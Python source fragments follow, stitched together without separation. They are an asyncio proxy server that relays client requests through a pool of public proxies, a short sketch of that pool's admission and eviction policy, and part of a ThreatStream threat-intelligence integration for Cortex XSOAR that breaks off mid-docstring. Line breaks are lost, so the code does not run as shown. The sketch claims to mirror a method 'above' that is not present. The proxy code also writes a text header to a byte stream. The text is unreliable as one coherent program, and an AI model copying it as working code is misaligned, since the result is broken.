int(port) self._loop = loop or asyncio.get_event_loop() self._timeout = timeout self._max_tries = max_tries self._backlog = backlog self._prefer_connect = prefer_connect self._server = None self._connections = {} self._proxy_pool = ProxyPool( proxies, min_req_proxy, max_error_rate, max_resp_time ) self._resolver = Resolver(loop=self._loop) self._http_allowed_codes = http_allowed_codes or [] def start(self): srv = asyncio.start_server( self._accept, host=self.host, port=self.port, backlog=self._backlog, loop=self._loop, ) self._server = self._loop.run_until_complete(srv) log.info( 'Listening established on {0}'.format( self._server.sockets[0].getsockname() ) ) def stop(self): if not self._server: return for conn in self._connections: if not conn.done(): conn.cancel() self._server.close() if 
not self._loop.is_running(): self._loop.run_until_complete(self._server.wait_closed()) # Time to close the running futures in self._connections self._loop.run_until_complete(asyncio.sleep(0.5)) self._server = None self._loop.stop() log.info('Server is stopped') def _accept(self, client_reader, client_writer): def _on_completion(f): reader, writer = self._connections.pop(f) writer.close() log.debug('client: %d; closed' % id(client_reader)) try: exc = f.exception() except asyncio.CancelledError: log.debug('CancelledError in server._handle:_on_completion') exc = None if exc: if isinstance(exc, NoProxyError): self.stop() else: raise exc f = asyncio.ensure_future(self._handle(client_reader, client_writer)) f.add_done_callback(_on_completion) self._connections[f] = (client_reader, client_writer) async def _handle(self, client_reader, client_writer): log.debug( 'Accepted connection from %s' % (client_writer.get_extra_info('peername'),) ) request, headers = await self._parse_request(client_reader) scheme = self._identify_scheme(headers) client = id(client_reader) log.debug( 'client: %d; request: %s; headers: %s; scheme: %s' % (client, request, headers, scheme) ) # API for controlling proxybroker2 if headers['Host'] == 'proxycontrol': _api, _operation, _params = headers['Path'].split('/', 5)[3:] if _api == 'api': if _operation == 'remove': proxy_host, proxy_port = _params.split(':', 1) self._proxy_pool.remove(proxy_host, int(proxy_port)) log.debug( 'Remove Proxy: client: %d; request: %s; headers: %s; scheme: %s; proxy_host: %s; proxy_port: %s' % (client, request, headers, scheme, proxy_host, proxy_port) ) client_writer.write(b'HTTP/1.1 204 No Content\r\n\r\n') await client_writer.drain() return elif _operation == 'history': query_type, url = _params.split(':', 1) if query_type == 'url': previous_proxy = history.get( f"{client_reader._transport.get_extra_info('peername')[0]}-{url}" ) if previous_proxy is None: client_writer.write(b'HTTP/1.1 204 No Content\r\n\r\n') await client_writer.drain() return else: previous_proxy_bytestring = ( '{"proxy": "%s"}' % previous_proxy ).encode() client_writer.write(b'HTTP/1.1 200 OK\r\n') client_writer.write(b'Content-Type: application/json\r\n') client_writer.write( f"Content-Length: {str(len(previous_proxy_bytestring) + 2).encode()}\r\n" ) client_writer.write(b'Access-Control-Allow-Origin: *\r\n') client_writer.write( b'Access-Control-Allow-Credentials: true\r\n\r\n' ) client_writer.write(previous_proxy_bytestring + b'\r\n') await client_writer.drain() return for attempt in range(self._max_tries): stime, err = 0, None proxy = await self._proxy_pool.get(scheme) proto = self._choice_proto(proxy, scheme) log.debug( 'client: %d; attempt: %d; proxy: %s; proto: %s' % (client, attempt, proxy, proto) ) try: await proxy.connect() if proto in ('CONNECT:80', 'SOCKS4', 'SOCKS5'): host = headers.get('Host') port = headers.get('Port', 80) try: ip = await self._resolver.resolve(host) except ResolveError: return proxy.ngtr = proto await proxy.ngtr.negotiate(host=host, port=port, ip=ip) if scheme == 'HTTPS' and proto in ('SOCKS4', 'SOCKS5'): client_writer.write(CONNECTED) await client_writer.drain() else: # HTTP await proxy.send(request) else: # proto: HTTP & HTTPS await proxy.send(request) stime = time.time() stream = [ asyncio.ensure_future( self._stream(reader=client_reader, writer=proxy.writer) ), asyncio.ensure_future( self._stream( reader=proxy.reader, writer=client_writer, scheme=scheme, ) ), ] await asyncio.gather(*stream, loop=self._loop) except asyncio.CancelledError: 
log.debug('Cancelled in server._handle') break except ( ProxyTimeoutError, ProxyConnError, ProxyRecvError, ProxySendError, ProxyEmptyRecvError, BadStatusError, BadResponseError, ) as e: log.debug('client: %d; error: %r' % (client, e)) continue except ErrorOnStream as e: log.debug( 'client: %d; error: %r; EOF: %s' % (client, e, client_reader.at_eof()) ) for task in stream: if not task.done(): task.cancel() if client_reader.at_eof() and 'Timeout' in repr(e): # Proxy may not be able to receive EOF and weel be raised a # TimeoutError, but all the data has already successfully # returned, so do not consider this error of proxy break err = e if scheme == 'HTTPS': # SSL Handshake probably failed break else: break finally: proxy.log(request.decode(), stime, err=err) proxy.close() self._proxy_pool.put(proxy) async def _parse_request(self, reader, length=65536): request = await reader.read(length) headers = parse_headers(request) if headers['Method'] == 'POST' and request.endswith(b'\r\n\r\n'): # For aiohttp. POST data returns on second reading request += await reader.read(length) return request, headers def _identify_scheme(self, headers): if headers['Method'] == 'CONNECT': return 'HTTPS' else: return 'HTTP' def _choice_proto(self, proxy, scheme): if scheme == 'HTTP': if self._prefer_connect and ('CONNECT:80' in proxy.types): proto = 'CONNECT:80' else: relevant = { 'HTTP', 'CONNECT:80', 'SOCKS4', 'SOCKS5', } & proxy.types.keys() proto = relevant.pop() else: # HTTPS relevant = {'HTTPS', 'SOCKS4', 'SOCKS5'} & proxy.types.keys() proto = relevant.pop() return proto async def _stream(self, reader, writer, length=65536, scheme=None): checked = False try: while not reader.at_eof(): data = await asyncio.wait_for( reader.read(length), self._timeout ) if not data: writer.close() break elif scheme and not checked: self._check_response(data, scheme) checked = True writer.write(data) await writer.drain() except ( asyncio.TimeoutError, ConnectionResetError, OSError, ProxyRecvError, BadStatusError, BadResponseError, ) as e: raise ErrorOnStream(e) def _check_response(self, data, scheme): if scheme == 'HTTP' and self._http_allowed_codes: line = data.split(b'\r\n', 1)[0].decode() try: header = parse_status_line(line) except BadStatusLine: raise BadResponseError if header['Status'] not in self._http_allowed_codes: raise BadStatusError( '%r not in %r' % (header['Status'], self._http_allowed_codes) )
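# A minimal, self-contained sketch of the admission/eviction policy that
# ProxyPool.put applies above: proxies with fewer than `min_req_proxy`
# requests stay in the newcomer list, proxies exceeding the error-rate or
# response-time limits are dropped, and everything else is ranked on a heap.
# FakeProxy is a hypothetical stand-in for the real Proxy objects, which
# track their own statistics and priority.
import heapq

class FakeProxy:
    def __init__(self, host, port, requests, errors, avg_resp_time):
        self.host, self.port = host, port
        self.stat = {'requests': requests}
        self.error_rate = errors / requests if requests else 0.0
        self.avg_resp_time = avg_resp_time
        # Lower tuple sorts first on the min-heap (better proxy).
        self.priority = (self.error_rate, self.avg_resp_time)

def put(pool, newcomers, proxy, min_req_proxy=5, max_error_rate=0.5, max_resp_time=8):
    too_slow_or_flaky = (proxy.error_rate > max_error_rate
                         or proxy.avg_resp_time > max_resp_time)
    if proxy.stat['requests'] < min_req_proxy:
        newcomers.append(proxy)          # not enough data yet, keep trying it
    elif too_slow_or_flaky:
        print('%s:%d removed from proxy pool' % (proxy.host, proxy.port))
    else:
        heapq.heappush(pool, (proxy.priority, proxy))

pool, newcomers = [], []
put(pool, newcomers, FakeProxy('10.0.0.1', 8080, requests=2, errors=0, avg_resp_time=1.0))
put(pool, newcomers, FakeProxy('10.0.0.2', 3128, requests=10, errors=8, avg_resp_time=2.0))
put(pool, newcomers, FakeProxy('10.0.0.3', 8888, requests=10, errors=1, avg_resp_time=0.5))
print(len(newcomers), 'newcomer(s) kept,', len(pool), 'proxy(ies) ranked in the pool')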
import emoji import demistomock as demisto from CommonServerPython import * import traceback REPUTATION_COMMANDS = ['ip', 'domain', 'file', 'url', 'threatstream-email-reputation'] # Disable insecure warnings requests.packages.urllib3.disable_warnings() ''' GLOBALS/PARAMS ''' THREAT_STREAM = 'ThreatStream' NO_INDICATORS_FOUND_MSG = 'No intelligence has been found for {searchable_value}' DEFAULT_MALICIOUS_THRESHOLD = 65 DEFAULT_SUSPICIOUS_THRESHOLD = 25 HEADERS = { 'Content-Type': 'application/json' } IOC_ARGS_TO_INDICATOR_KEY_MAP = { 'domain': { 'domain': 'value', 'dns': 'ip', 'organization': 'org', 'traffic_light_protocol': 'tlp', 'geo_country': 'country', 'creation_date': 'created_ts', 'updated_date': 'modified_ts', 'registrant_name': 'meta.registrant_name', 'registrant_email': 'meta.registrant_email', 'registrant_phone': 'meta.registrant_phone' }, 'url': { 'url': 'value', 'asn': 'asn', 'organization': 'org', 'geo_country': 'country', 'traffic_light_protocol': 'tlp' }, 'ip': { 'ip': 'value', 'asn': 'asn', 'geo_latitude': 'latitude', 'geo_longitude': 'longitude', 'geo_country': 'country', 'traffic_light_protocol': 'tlp' }, 'file': { 'organization': 'org', 'traffic_light_protocol': 'tlp' } } DEFAULT_INDICATOR_MAPPING = { 'asn': 'ASN', 'value': 'Address', 'country': 'Country', 'type': 'Type', 'modified_ts': 'Modified', 'confidence': 'Confidence', 'status': 'Status', 'org': 'Organization', 'source': 'Source', 'tags': 'Tags', } FILE_INDICATOR_MAPPING = { 'modified_ts': 'Modified', 'confidence': 'Confidence', 'status': 'Status', 'source': 'Source', 'subtype': 'Type', 'tags': 'Tags' } INDICATOR_EXTENDED_MAPPING = { 'Value': 'value', 'ID': 'id', 'IType': 'itype', 'Confidence': 'confidence', 'Country': 'country', 'Organization': 'org', 'ASN': 'asn', 'Status': 'status', 'Tags': 'tags', 'Modified': 'modified_ts', 'Source': 'source', 'Type': 'type', 'Severity': 'severity' } RELATIONSHIPS_MAPPING = { 'ip': [ { 'name': EntityRelationship.Relationships.RESOLVES_TO, 'raw_field': 'rdns', 'entity_b_type': FeedIndicatorType.Domain }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'domain': [ { 'name': EntityRelationship.Relationships.RESOLVED_FROM, 'raw_field': 'ip', 'entity_b_type': FeedIndicatorType.IP }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'url': [ { 'name': EntityRelationship.Relationships.RESOLVED_FROM, 'raw_field': 'ip', 'entity_b_type': FeedIndicatorType.IP }, { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'file': [ { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ], 'email': [ { 'name': EntityRelationship.Relationships.INDICATOR_OF, 'raw_field': 'meta.maltype', 'entity_b_type': 'Malware' } ] } ''' HELPER FUNCTIONS ''' class Client(BaseClient): def __init__(self, base_url, user_name, api_key, verify, proxy, reliability, should_create_relationships): super().__init__(base_url=base_url, verify=verify, proxy=proxy, ok_codes=(200, 201, 202)) self.reliability = reliability self.should_create_relationships = should_create_relationships self.credentials = { 'username': user_name, 'api_key': api_key } def http_request(self, method, url_suffix, params=None, data=None, headers=None, files=None, json=None, resp_type='json'): """ A wrapper for requests lib to send our requests and handle requests and responses better. 
""" params = params or {} params.update(self.credentials) res = super()._http_request( method=method, url_suffix=url_suffix, headers=headers, params=params, data=data, json_data=json, files=files, resp_type=resp_type, error_handler=self.error_handler, ) return res def error_handler(self, res: requests.Response): """ Error handler to call by super().http_request in case an error was occurred """ # Handle error responses gracefully if res.status_code == 401: raise DemistoException(f"{THREAT_STREAM} - Got unauthorized from the server. Check the credentials.") elif res.status_code in {404}: command = demisto.command() if command in ['threatstream-get-model-description', 'threatstream-get-indicators-by-model', 'threatstream-get-analysis-status', 'threatstream-analysis-report']: # in order to prevent raising en error in case model/indicator/report was not found return else: raise DemistoException(f"{THREAT_STREAM} - The resource was not found.") raise DemistoException(F"{THREAT_STREAM} - Error in API call {res.status_code} - {res.text}") class DBotScoreCalculator: """ Class for DBot score calculation based on thresholds and confidence """ def __init__(self, params: Dict): self.instance_defined_thresholds = { DBotScoreType.IP: arg_to_number(params.get('ip_threshold')), DBotScoreType.URL: arg_to_number(params.get('url_threshold')), DBotScoreType.FILE: arg_to_number(params.get('file_threshold')), DBotScoreType.DOMAIN: arg_to_number(params.get('domain_threshold')), DBotScoreType.EMAIL: arg_to_number(params.get('email_threshold')), } def calculate_score(self, ioc_type: str, indicator, threshold=None): """ Calculate the DBot score according the indicator's confidence and thresholds if exist """ # in case threshold was defined in the instance or passed as argument # we have only two scores levels - malicious or good # if threshold wasn't defined we have three score levels malicious suspicious and good confidence = indicator.get('confidence', Common.DBotScore.NONE) defined_threshold = threshold or self.instance_defined_thresholds.get(ioc_type) if defined_threshold: return Common.DBotScore.BAD if confidence >= defined_threshold else Common.DBotScore.GOOD else: if confidence > DEFAULT_MALICIOUS_THRESHOLD: return Common.DBotScore.BAD if confidence > DEFAULT_SUSPICIOUS_THRESHOLD: return Common.DBotScore.SUSPICIOUS else: return Common.DBotScore.GOOD def find_worst_indicator(indicators): """ Sorts list of indicators by confidence score and returns one indicator with the highest confidence. In case the indicator has no confidence value, the indicator score is set to 0 (NONE). 
""" indicators.sort(key=lambda ioc: ioc.get('confidence', Common.DBotScore.NONE), reverse=True) return indicators[0] def prepare_args(args, command, params): # removing empty keys that can be passed from playbook input args = {k: v for (k, v) in args.items() if v} # special handling for ip, domain, file, url and threatstream-email-reputation commands if command in REPUTATION_COMMANDS: default_include_inactive = params.get('include_inactive', False) include_inactive = argToBoolean(args.pop('include_inactive', default_include_inactive)) args['status'] = "active,inactive" if include_inactive else "active" if 'threshold' in args: args['threshold'] = arg_to_number(args['threshold']) # special handling for threatstream-get-indicators if 'indicator_severity' in args: args['meta.severity'] = args.pop('indicator_severity', None) if 'tags_name' in args: args['tags.name'] = args.pop('tags_name', None) if 'indicator_value' in args: args['value'] = args.pop('indicator_value', None) return args def get_tags(indicator): """ Return list of the indicator's tags threat_type and maltype """ tags = [] for key in ['meta.maltype', 'threat_type']: val = demisto.get(indicator, key) if val: tags.append(val) indicator_tags = indicator.get('tags', []) if indicator_tags: tags.extend([str(tag.get('name', '')) for tag in indicator_tags]) return tags def search_worst_indicator_by_params(client: Client, params): """ Generic function that searches for indicators from ThreatStream by given query string. Returns indicator with the highest confidence score. """ indicators_data = client.http_request("Get", "v2/intelligence/", params=params) if not indicators_data['objects']: return None return find_worst_indicator(indicators_data['objects']) def get_generic_threat_context(indicator, indicator_mapping=DEFAULT_INDICATOR_MAPPING): """ Receives indicator and builds new dictionary from values that were defined in DEFAULT_INDICATOR_MAPPING keys and adds the Severity key with indicator severity value. """ context = {indicator_mapping[k]: v for (k, v) in indicator.items() if k in indicator_mapping.keys()} context['Tags'] = get_tags(indicator) context['Severity'] = demisto.get(indicator, 'meta.severity') or 'low' return context def parse_network_elem(element_list, context_prefix): """ Parses the network elements list and returns a new dictionary. """ return list(map(lambda e: { F'{context_prefix}Source': e.get('src', ''), F'{context_prefix}Destination': e.get('dst', ''), F'{context_prefix}Port': e.get('dport', ''), }, element_list)) def parse_network_lists(network): """ Parses the network part that was received from sandbox report json. In each list, only sublist of 10 elements is taken. 
""" hosts = [{'Hosts': h} for h in network.get('hosts', [])[:10]] if 'packets' in network: network = network['packets'] udp_list = parse_network_elem(network.get('udp', [])[:10], 'Udp') icmp_list = parse_network_elem(network.get('icmp', [])[:10], 'Icmp') tcp_list = parse_network_elem(network.get('tcp', [])[:10], 'Tcp') http_list = parse_network_elem(network.get('http', [])[:10], 'Http') https_list = parse_network_elem(network.get('https', [])[:10], 'Https') network_result = udp_list + icmp_list + tcp_list + http_list + https_list + hosts return network_result def parse_info(info): """ Parses the info part that was received from sandbox report json """ info.update(info.pop('machine', {})) parsed_info = { 'Category': info.get('category', '').title(), 'Started': info.get('started', ''), 'Completed': info.get('ended', ''), 'Duration': info.get('duration', ''), 'VmName': info.get('name', ''), 'VmID': info.get('id', '') } return parsed_info def parse_indicators_list(iocs_list): """ Parses the indicator list and returns dictionary that will be set to context. """ iocs_context = [] for indicator in iocs_list: if indicator.get('type', '') == 'md5': indicator['type'] = indicator.get('subtype', '') indicator['severity'] = demisto.get(indicator, 'meta.severity') or 'low' tags = indicator.get('tags') or [] indicator['tags'] = ",".join(tag.get('name', '') for tag in tags) iocs_context.append({key: indicator.get(ioc_key) for (key, ioc_key) in INDICATOR_EXTENDED_MAPPING.items()}) return iocs_context def build_model_data(model, name, is_public, tlp, tags, intelligence, description): """ Builds data dictionary that is used in Threat Model creation/update request. """ if model == 'tipreport': description_field_name = 'body' else: description_field_name = 'description' data = {k: v for (k, v) in (('name', name), ('is_public', is_public), ('tlp', tlp), (description_field_name, description)) if v} if tags: data['tags'] = tags if isinstance(tags, list) else [t.strip() for t in tags.split(',')] if intelligence: data['intelligence'] = intelligence if isinstance(intelligence, list) else [i.strip() for i in intelligence.split(',')] return data def create_relationships(client: Client, indicator, ioc_type, relation_mapper): relationships: List[EntityRelationship] = [] if not client.should_create_relationships: return relationships for relation in relation_mapper: entity_b = demisto.get(indicator, relation['raw_field']) if entity_b: relationships.append(EntityRelationship(entity_a=indicator['value'], entity_a_type=ioc_type, name=relation['name'], entity_b=entity_b, entity_b_type=relation['entity_b_type'], source_reliability=client.reliability, brand=THREAT_STREAM)) return relationships ''' COMMANDS + REQUESTS FUNCTIONS ''' def test_module(client: Client): """ Performs basic get request to get item samples """ client.http_request('GET', 'v2/intelligence/', params=dict(limit=1)) return 'ok' def ips_reputation_command(client: Client, score_calc: DBotScoreCalculator, ip, status, threshold=None): results = [] # type: ignore ips = argToList(ip, ',') for single_ip in ips: results.append(get_ip_reputation(client, score_calc, single_ip, status, threshold)) return results def get_ip_reputation(client: Client, score_calc: DBotScoreCalculator, ip, status, threshold=None): """ Checks the reputation of given ip from ThreatStream and returns the indicator with highest confidence score. 
""" # get the indicator params = { 'value': ip, 'type': DBotScoreType.IP, 'status': status, 'limit': 0, } indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=ip) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'IP reputation for: {ip}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.IP, RELATIONSHIPS_MAPPING.get('ip'), ) # create the IP instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('ip') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} dbot_score = Common.DBotScore( ip, DBotScoreType.IP, THREAT_STREAM, score=score_calc.calculate_score(DBotScoreType.IP, indicator, threshold), reliability=client.reliability, ) ip_indicator = Common.IP( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.IP', outputs_key_field='Address', indicator=ip_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def domains_reputation_command(client: Client, score_calc: DBotScoreCalculator, domain, status, threshold=None): """ Wrapper function for get_domain_reputation. """ results = [] # type: ignore domains = argToList(domain, ',') for single_domain in domains: results.append(get_domain_reputation(client, score_calc, single_domain, status, threshold)) return results def get_domain_reputation(client: Client, score_calc: DBotScoreCalculator, domain, status, threshold=None): """ Checks the reputation of given domain from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = dict(value=domain, type=DBotScoreType.DOMAIN, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=domain) # Convert the tags objects into s string for the human readable. 
threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'Domain reputation for: {domain}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.Domain, RELATIONSHIPS_MAPPING.get('domain'), ) # create the Domain instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('domain') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} geo_location = f"{indicator.get("latitude")},{indicator.get("longitude")}" if indicator.get('latitude') else None dbot_score = Common.DBotScore( domain, DBotScoreType.DOMAIN, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.DOMAIN, indicator, threshold), ) domain_indicator = Common.Domain( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], geo_location=geo_location, relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Domain', outputs_key_field='Address', indicator=domain_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def files_reputation_command(client: Client, score_calc: DBotScoreCalculator, file, status, threshold=None): """ Wrapper function for get_file_reputation. """ results = [] files = argToList(file, ',') for single_file in files: results.append(get_file_reputation(client, score_calc, single_file, status, threshold)) return results def get_file_reputation(client: Client, score_calc: DBotScoreCalculator, file, status, threshold=None): """ Checks the reputation of given hash of the file from ThreatStream and returns the indicator with highest severity score. """ # get the indicator params = dict(value=file, type="md5", status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=file) # save the hash value under the hash type key threat_context = get_generic_threat_context(indicator, indicator_mapping=FILE_INDICATOR_MAPPING) file_type: str = indicator.get('subtype') # The real type of the hash is in subtype field. if file_type: threat_context[file_type] = indicator.get('value') # Convert the tags objects into s string for the human readable. 
tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'File reputation for: {file}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.File, RELATIONSHIPS_MAPPING.get('file'), ) # create the File instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('file') # type: ignore kwargs = {arg: demisto.get(indicator, key) for (arg, key) in args_to_keys_map.items()} if file_type: kwargs[file_type.lower()] = threat_context[file_type] dbot_score = Common.DBotScore( file, DBotScoreType.FILE, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.FILE, indicator, threshold), ) file_indicator = Common.File( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.{Common.File.CONTEXT_PATH}', indicator=file_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def urls_reputation_command(client: Client, score_calc: DBotScoreCalculator, url, status, threshold=None): """ Wrapper function for get_url_reputation. """ results = [] urls = argToList(url, ',') for single_url in urls: results.append(get_url_reputation(client, score_calc, single_url, status, threshold)) return results def get_url_reputation(client: Client, score_calc: DBotScoreCalculator, url, status, threshold=None): """ Checks the reputation of given url address from ThreatStream and returns the indicator with highest confidence score. """ # get the indicator params = dict(value=url, type=DBotScoreType.URL, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=url) # Convert the tags objects into s string for the human readable. threat_context = get_generic_threat_context(indicator) tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'URL reputation for: {url}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.URL, RELATIONSHIPS_MAPPING.get('url'), ) # create the URL instance args_to_keys_map: Dict[str, str] = IOC_ARGS_TO_INDICATOR_KEY_MAP.get('url') # type: ignore kwargs = {arg: demisto.get(indicator, key_in_indicator) for (arg, key_in_indicator) in args_to_keys_map.items()} dbot_score = Common.DBotScore( url, DBotScoreType.URL, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.URL, indicator, threshold), ) url_indicator = Common.URL( dbot_score=dbot_score, tags=get_tags(indicator), threat_types=[Common.ThreatTypes(indicator.get('threat_type'))], relationships=relationships, **kwargs, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.URL', outputs_key_field='Address', indicator=url_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def get_email_reputation(client: Client, score_calc: DBotScoreCalculator, email, status, threshold=None): """ Checks the reputation of given email address from ThreatStream and returns the indicator with highest confidence score. 
""" params = dict(value=email, type=DBotScoreType.EMAIL, status=status, limit=0) indicator = search_worst_indicator_by_params(client, params) if not indicator: return NO_INDICATORS_FOUND_MSG.format(searchable_value=email) threat_context = get_generic_threat_context(indicator) threat_context['Email'] = threat_context.pop('Address') threat_context.pop('ASN', None) threat_context.pop('Organization', None) threat_context.pop('Country', None) # Convert the tags objects into s string for the human readable. tags_csv = ', '.join(threat_context.get('Tags', [])) human_readable = tableToMarkdown(f'Email reputation for: {email}', threat_context | dict(Tags=tags_csv)) # build relationships relationships = create_relationships( client, indicator, FeedIndicatorType.Email, RELATIONSHIPS_MAPPING.get('email'), ) dbot_score = Common.DBotScore( email, DBotScoreType.EMAIL, THREAT_STREAM, reliability=client.reliability, score=score_calc.calculate_score(DBotScoreType.EMAIL, indicator, threshold), ) # create the EMAIL instance email_indicator = Common.EMAIL( dbot_score=dbot_score, address=threat_context['Email'], relationships=relationships, ) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.EmailReputation', outputs_key_field='Email', indicator=email_indicator, readable_output=human_readable, outputs=threat_context, raw_response=indicator, relationships=relationships ) def get_passive_dns(client: Client, value, type=DBotScoreType.IP, limit=50): """ Receives value and type of indicator and returns enrichment data for domain or ip. """ dns_results = client.http_request("GET", F"v1/pdns/{type}/{value}/").get('results', None) if not dns_results: return f'No Passive DNS enrichment data found for {value}' dns_results = dns_results[:int(limit)] output = camelize(dns_results, delim='_') human_readable = tableToMarkdown(f'Passive DNS enrichment data for: {value}', output) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.PassiveDNS', readable_output=human_readable, outputs=output, raw_response=dns_results, ) def import_ioc_with_approval(client: Client, import_type, import_value, confidence="50", classification="Private", threat_type="exploit", severity="low", ip_mapping=None, domain_mapping=None, url_mapping=None, email_mapping=None, md5_mapping=None): """ Imports indicators data to ThreatStream. The data can be imported using one of three import_types: data-text (plain-text), file-id of uploaded file to war room or URL. """ # prepare data = assign_params( classification=classification, confidence=int(confidence), ip_mapping=ip_mapping, domain_mapping=domain_mapping, url_mapping=url_mapping, email_mapping=email_mapping, md5_mapping=md5_mapping, threat_type=threat_type, severity=severity, ) files = None uploaded_file = None if import_type == 'file-id': try: # import_value should be entry id of uploaded file in war room file_info = demisto.getFilePath(import_value) except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {import_value} does not contain a file.') uploaded_file = open(file_info['path'], 'rb') files = {'file': (file_info['name'], uploaded_file)} else: data[import_type] = import_value # request res = client.http_request("POST", "v1/intelligence/import/", data=data, files=files) # closing the opened file if exist if uploaded_file: uploaded_file.close() # checking that response contains success key if res.get('success', False): imported_id = res.get('import_session_id', '') readable_output = f'The data was imported successfully. 
The ID of imported job is: {imported_id}' return CommandResults( outputs_prefix=f'{THREAT_STREAM}.Import.ImportID', outputs_key_field='ImportID', outputs=imported_id, readable_output=readable_output, raw_response=res, ) else: raise DemistoException('The data was not imported. Check if valid arguments were passed') def import_ioc_without_approval(client: Client, file_id, classification, confidence=None, allow_unresolved='no', source_confidence_weight=None, expiration_ts=None, severity=None, tags=None, trustedcircles=None): """ Imports indicators data to ThreatStream. file_id of uploaded file to war room. """ if tags: tags = argToList(tags) if trustedcircles: trustedcircles = argToList(trustedcircles) try: # entry id of uploaded file to war room file_info = demisto.getFilePath(file_id) with open(file_info['path'], 'rb') as uploaded_file: ioc_to_import = json.load(uploaded_file) except json.JSONDecodeError: raise DemistoException(f'{THREAT_STREAM} - Entry {file_id} does not contain a valid json file.') except Exception: raise DemistoException(f'{THREAT_STREAM} - Entry {file_id} does not contain a file.') ioc_to_import.update({'meta': assign_params( classification=classification, confidence=confidence, allow_unresolved=argToBoolean(allow_unresolved), source_confidence_weight=source_confidence_weight, expiration_ts=expiration_ts, severity=severity, tags=tags, trustedcircles=trustedcircles )}) client.http_request("PATCH", "v1/intelligence/", json=ioc_to_import, resp_type='text') return "The data was imported successfully." def get_model_list(client: Client, model, limit="50"): """ Returns list of Threat Model that was specified. By default limit is set to 50 results. Possible values for model are : actor, campaign, incident, signature, ttp, vulnerability, tipreport """ # if limit=0 don't put to context params = dict(limit=limit, skip_intelligence="true", skip_associations="true") model_list = client.http_request("GET", F"v1/{model}/", params=params).get('objects', None) if not model_list: return f'No Threat Model {model.title()} found.' model_type = model.title() models_context = [ { 'Name': threat_model.get('name'), 'ID': threat_model.get('id'), 'CreatedTime': threat_model.get('created_ts'), 'Type': model_type } for threat_model in model_list ] # in case that no limit was passed, the stage of set to context is skipped readable_output = tableToMarkdown(f"List of {model.title()}s", models_context) return CommandResults( outputs_prefix=f'{THREAT_STREAM}.List', outputs_key_field='ID', outputs=models_context if limit != '0' else None, readable_output=readable_output, raw_response=model_list ) def get_model_description(client: Client, model, id): """ Returns a description of Threat Model as html file to the war room. """ params = dict(skip_intelligence="true", skip_associations="true") response = client.http_request("GET", F"v1/{model}/{id}", params=params, resp_type='response') if response.status_code == 404: return f'No description found for Threat Model {model.title()} with id {id}' description = response.json() if model == 'signature': description = description.get('notes', '') elif model == 'tipreport': description = description.get('body', '') else: description = description.get('description', None) return fileResult(F"{model}_{id}.html", description.encode(encoding='UTF-8')) def get_iocs_by_model(client: Client, model, id, limit="20"): """ Returns list of indicators associated with specific Threat Model by model id. 
